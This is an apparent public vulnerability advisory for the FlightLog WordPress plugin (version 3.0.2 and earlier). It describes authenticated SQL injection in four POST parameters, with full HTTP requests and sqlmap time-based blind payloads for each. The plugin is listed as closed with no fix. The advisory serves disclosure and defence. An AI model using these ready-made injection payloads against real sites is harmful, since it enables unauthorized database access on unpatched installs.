FlightLog <= 3.0.2 - Authenticated (editor+) SQL Injection
Description
The plugin does not sanitise, validate or escape various POST parameters before using them a SQL statement, leading to SQL injections exploitable by editor and administrator users
Proof of Concept
1. to and from parameters (Editor Level)
Tools -> Flightlog -> add a record
POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Host: 172.28.128.50
section=flight&dt=&from=1&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add
Sample SQLMap Output
sqlmap identified the following injection point(s) with a total of 467 HTTP(s) requests:
---
Parameter: to (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: section=flight&dt=&from=1&to=1 AND (SELECT 1824 FROM (SELECT(SLEEP(5)))Eims)&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add
Parameter: from (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: section=flight&dt=&from=1 AND (SELECT 9760 FROM (SELECT(SLEEP(5)))zCHx)&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add
---
2. id parameter vulnerable (Admin Level)
Steps
- Settings -> Flightlog
- add an airport
- update the airport
Sample Request
POST http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 84
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [admin]
Host: 172.28.128.50
section=airports&id=2&name=a&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update
SQLMap Output
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: section=airports&id=2 AND (SELECT 1421 FROM (SELECT(SLEEP(5)))GfMZ)&name=bhopal&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update
3. flight_id parameter vulnerable (Editor Level)
Steps
- Login as editor
- tools -> FlightLog
- Edit a flight log entry and add a remark
Vulnerable Request
POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 52
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Host: 172.28.128.50
flight_id=3045§ion=rem&remark=Test&Submit=Update
SQLMap Sample Output
Parameter: flight_id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: flight_id=3045 AND (SELECT 1932 FROM (SELECT(SLEEP(5)))XEdw)§ion=rem&remark=Test&Submit=Update
Affects Plugins
No known fix - plugin closed
Classification
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
Timeline
Publicly Published
2021-05-19 (about 4 months ago)
Added
2021-05-19 (about 4 months ago)
Last Updated
2021-05-20 (about 4 months ago)